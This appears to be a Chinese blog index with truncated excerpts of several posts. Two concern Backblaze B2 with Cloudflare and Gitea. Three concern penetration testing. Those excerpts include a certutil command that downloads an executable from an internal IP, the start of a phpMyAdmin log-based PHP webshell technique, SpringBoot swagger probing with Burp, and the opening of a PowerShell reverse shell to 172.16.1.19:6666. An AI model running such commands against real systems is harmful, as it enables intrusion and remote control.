Loading...
写在开始最近因为某些原因,想要将Backblaze的桶走Cloudflare去白嫖流量,所以在网上找了一些教程。问题描述开始,直接CNAME接入的时候很正常,但是当想要重写一下路径将桶隐藏的时候就出现了问题。{ "code": "not_found", "message": "/api/top_level_url_mapp...
写在开始因为要考虑服务器的容量,所以我把我现在用的Gitea接入了Backblaze B2,因为价格非常低,1T的容量用一年都不到450人民币。问题描述但是接上之后就发现问题了,传个文件弹失败。看Gitea的日志发现2023/08/29 10:14:15 ...lfs/content_store.go:58:Put() [E] [64edfd37-2] Whilst putting LFS ...
写在开始最近搞网安渗透比较多,这里列举一下常用的一些命令,用于备忘下载文件在windows上下载文件用的命令certutil.exe -urlcache -split -f http://172.16.1.28:2020/a.exe a.exe一句话木马在phpMyAdmin中写一句话木马的一种方法,是写在phpMyAdmin的日志里show variables like '%general...
写在开始下面说一下一些渗透SpringBoot时使用的BurpSuite插件和寻找漏洞的思路,主要是找特定文件来找一些泄漏的配置操作过程安装OneScan和HaE点到OneScan的Dashboard里,点开Listen Proxy Message然后Payload里Clear然后Paste一些判断/api/swagger.json /v2/swagger.json /api/swagg...
写在开始之前发现了一个纯靠PowerShell就能弹Shell的方式,特地记录一下使用方式原理是调用C#的库,建立TCP连接代码如下$client = New-Object System.Net.Sockets.TCPClient('172.16.1.19', 6666); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535 | ...